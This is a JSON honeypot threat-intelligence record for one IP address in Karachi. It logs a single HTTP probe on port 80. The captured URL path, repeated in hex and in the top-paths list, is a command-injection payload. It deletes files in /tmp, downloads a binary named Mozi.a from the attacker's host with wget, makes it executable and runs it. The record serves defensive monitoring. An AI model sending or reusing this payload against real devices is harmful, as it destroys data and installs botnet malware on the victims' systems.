{"ip":"175.107.212.44","total_events":1,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"nsp"},"first_seen":"2026-06-09T06:40:33","last_seen":"2026-06-09T06:40:33","events_24h":0,"events_7d":0,"geo":{"country_code":"PK","country_name":"Pakistan","region":"Sindh","city":"Karachi","lat":24.8591,"lon":66.9983,"asn":9541,"org":"Cyber Internet Services Pvt Ltd."},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as9541","label":"Cyber Internet Services","category":"isp","url":"https://www.peeringdb.com/asn/9541"},"cve_matches":[],"top_ports":[{"port":80,"proto":"tcp","label":"HTTP","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge11nn0400_1830ad44f9e1"]},"fingerprint_peers":{"ge11nn0400_1830ad44f9e1":27},"user_agents":["Hello, world"],"timeline":[{"date":"2026-06-09","count":1}],"recent_events":[{"timestamp":"2026-06-09T06:40:33","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\"connection\":\"keep-alive\",\"host\":\"<HONEYPOT>:80\",\"user-agent\":\"Hello, world\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/shell?cd+/tmp;rm+-rf+*;wget+http://175.107.212.44:38058/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws","summary":"","payload_hex":"474554202f7368656c6c3f63642b2f746d703b726d2b2d72662b2a3b776765742b687474703a2f2f3137352e3130372e3231322e34343a33383035382f4d6f7a692e613b63686d6f642b3737372b4d6f7a692e613b2f746d702f4d6f7a692e612b6a61777320485454502f312e310d0a557365722d4167656e743a2048656c6c6f2c20776f726c640d0a486f73743a20<HONEYPOT>3a38300d0a4163636570743a20746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e380d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a0d0a","method":"GET","user_agent":"Hello, world","community_id":"1:L8m7fH1moWzmJzMJr9v+BNxPjGM=","ja3":"","session":"bdd499f6-c5f8-40a5-a4dc-bfd1ba1bccd4","seq":1,"duration_ms":100,"bytes_in":271,"bytes_out":79}],"http_methods":[{"method":"GET","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/shell?cd+/tmp;rm+-rf+*;wget+http://175.107.212.44:38058/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Connection","Host","User-Agent"],"representative":[{"name":"Accept","value":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Host","value":"<HONEYPOT>:80","notable":false},{"name":"User-Agent","value":"Hello, world","notable":false}],"distinct_sets":1,"events_with_headers":1},"tags":[],"data_as_of":"2026-06-20T00:12:55.029038+00:00"}